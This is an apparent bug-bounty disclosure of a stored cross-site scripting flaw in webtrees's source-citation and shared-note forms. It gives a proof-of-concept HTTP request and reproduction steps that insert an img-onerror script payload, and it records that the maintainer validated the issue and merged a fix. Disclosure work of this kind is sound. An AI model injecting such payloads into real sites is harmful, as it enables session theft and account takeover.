Cross-site Scripting (XSS) - Stored in fisharebest/webtrees


Reported on

Sep 30th 2021


Multiple Stored XSS when Add new record at features Add a source citation, Add a shared note

Proof of Concept

// PoC.req
POST /demo-stable/index.php?route=%2Fdemo-stable%2Ftree%2Fdemo%2Fcreate-source HTTP/2
Cookie: __Secure-WT-ID=35jvr7cdk25bf0s6k0e1r91c3e
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Csrf-Token: U4WFspy3SiSfyzQJ9lYihH20kG0SUVKt
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------75901138012122049362463935295
Content-Length: 1331
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

Content-Disposition: form-data; name="_csrf"

Content-Disposition: form-data; name="source-title"

"><iMg SrC="x" oNeRRor="alert(1);">
Content-Disposition: form-data; name="source-abbreviation"

Content-Disposition: form-data; name="source-author"

Content-Disposition: form-data; name="source-publication"

Content-Disposition: form-data; name="source-repository"

Content-Disposition: form-data; name="source-call-number"

Content-Disposition: form-data; name="source-text"

Content-Disposition: form-data; name="privacy-restriction"

Content-Disposition: form-data; name="edit-restriction"


Step to Reproduct

Add a source citation

Goto details of a person. Example:

At Tab Sources choose to Add a source citation

At Source choose to Create a source

At Title input with payload: "><iMg SrC="x" oNeRRor="alert(1);">

Add a shared note

At Tab Notes choose to Add a shared note

At Note choose to Create a shared note

At Note input with payload: "><iMg SrC="x" oNeRRor="alert(1);">


This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.

We have contacted a member of the fisharebest/webtrees team and are waiting to hear back a year ago
Greg Roach validated this vulnerability a year ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
Greg Roach confirmed that a fix has been merged on 6d966f a year ago
Greg Roach has been awarded the fix bounty
to join this conversation